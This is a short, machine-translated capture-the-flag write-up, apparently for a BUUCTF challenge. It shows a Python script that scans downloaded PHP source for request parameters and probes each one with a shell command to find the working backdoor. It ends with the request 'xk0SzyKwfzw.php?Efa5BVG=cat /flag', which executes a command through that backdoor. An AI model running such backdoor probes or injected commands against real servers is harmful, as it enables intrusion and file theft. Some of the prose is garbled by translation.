Prompt access source code www.tar.gz
To the URL plus www.tar.gz can be downloaded
Inside Super Multi php file down, screened by a python script Gangster
import os,re import requests filenames = os.listdir('D:/anquan/localtest/PHPTutorial/WWW/CTFtraining/BUUCTF/src/') pattern = re.compile(r"\$_[GEPOST]{3,4}\[.*\]") for name in filenames: print(name) with open('D:/anquan/localtest/PHPTutorial/WWW/CTFtraining/BUUCTF/src/'+name,'r') as f: data = f.read() result = list(set(pattern.findall(data))) for ret in result: try: command = 'echo "got it"' flag = 'got it' # command = 'phpinfo();' # flag = 'phpinfo' if 'GET' in ret: passwd = re.findall(r"'(.*)'",ret)[0] r = requests.get(url='http://127.0.0.1/CTFtraining/BUUCTF/src/' + name + '?' + passwd + '='+ command) if "got it" in r.text: print('backdoor file is: ' + name) print('GET: ' + passwd) elif 'POST' in ret: passwd = re.findall(r"'(.*)'",ret)[0] r = requests.post(url='http://127.0.0.1/CTFtraining/BUUCTF/src/' + name,data={passwd:command}) if "got it" in r.text: print('backdoor file is: ' + name) print('POST: ' + passwd) except : pass
I refer directly to the online wp deleted before the beginning of the x, walked for a long time (php version to use more than 7)
Access xk0SzyKwfzw.php? Efa5BVG = cat / flag to get flag